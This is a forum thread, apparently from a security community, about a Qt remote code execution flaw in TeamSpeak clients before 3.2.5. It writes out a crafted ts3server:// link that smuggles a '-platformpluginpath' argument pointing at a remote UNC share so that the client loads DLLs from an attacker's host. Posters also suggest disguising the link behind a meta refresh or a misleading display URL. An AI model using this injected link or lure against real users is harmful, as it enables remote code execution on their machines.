Remote Code Execution vulnerability in the Qt (Client < 3.2.5)

fyfywka

TeamSpeak Developer
Contributor
Sep 10, 2015
147
140
158

Bluscream

Retired Staff
Contributor
May 8, 2015
967
934
211

If it's that, you would need to trick the user to clicking something like [URL=ts3server://voice.teamspeak.com -platformpluginpath \\192.168.131.152\share]ts3server://voice.teamspeak.com[/URL]
 
Last edited:

Kieran

Tag me
Contributor
Jan 1, 2016
459
286
122
Very interesting. So basically you tell QT 'Ye, to load your DDLs pls look for them in "\\x.x.x.x\explt" when you start up thx'?
That means you can even put that on a website and kind of obfuscating the exploit in TS by putting the custom ts3server uri handler as a meta refresh on a page like this [url=mynotinnocenthomepage.com/puppies.html]mynotinnocenthomepage.com/puppies.html[/url], right?
 

InVaDeR359

Active Member
May 29, 2017
160
121
72
Very interesting. So basically you tell QT 'Ye, to load your DDLs pls look for them in "\\x.x.x.x\explt" when you start up thx'?
That means you can even put that on a website and kind of obfuscating the exploit in TS by putting the custom ts3server uri handler as a meta refresh on a page like this [url=mynotinnocenthomepage.com/puppies.html]mynotinnocenthomepage.com/puppies.html[/url], right?
I think you mean [url=mynotinnocenthomepage.com/puppies.html]myinnocenthomepage.com/puppies.html[/url]
 

Kieran

Tag me
Contributor
Jan 1, 2016
459
286
122
I think you mean [url=mynotinnocenthomepage.com/puppies.html]myinnocenthomepage.com/puppies.html[/url]
Also a possibility but that my spark suspicion, when someone copies the link instead of clicking right away when the displayed URL is different from the one that is linked
 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,844
2
2,197
327
Was it any guy from r4p3 that found this?
No, any software development frameworks offer a lot of extensibility to developers so they can work with and around the operating system. With frameworks being so powerful, they have the potential to be abused and ultimately misused for malicious purposes by hackers. This issue was found regarding QT, not specifically TeamSpeak but thankfully they (TeamSpeak developers) are staying on top of security patches - probably because we have made them rightfully paranoid which is a GOOD thing. We have done our job, now we are safer.

With that said, there may be more security issues with many frameworks like QT (TeamSpeak uses this framework for their software).

One example can be found here: https://securiteam.com/unixfocus/5NP0O2KDPI/ or http://scary.beasts.org/security/CESA-2004-004.txt

I believe something similar to this was used when we developed the avatar crasher: https://r4p3.net/threads/teamspeak-3-avatar-crash-client-3-0-0-3-0-17.335/

1Lgxche.png


If we found a way to utilize this vulnerability, we would have released a PoC (Proof of Concept) demonstrating how one could use this for educational purposes.

People like @Harrasan think everything in life comes free and no one has to work for anything, he is actually really close to being banned because you can find him complaining about everything and thinking proficient security researchers need $0 to run expensive servers and study for $8,000 reverse engineering classes for becoming a malware analyst and incident responder for the FBI/NSA/etc.

Update: A PoC is over here https://www.thezdi.com/blog/2019/4/...ugs-detailing-cve-2019-1636-and-cve-2019-6739

Picture4.png


Looks very simple... a security mistake that is small with big issues possible.
 
Last edited:
Top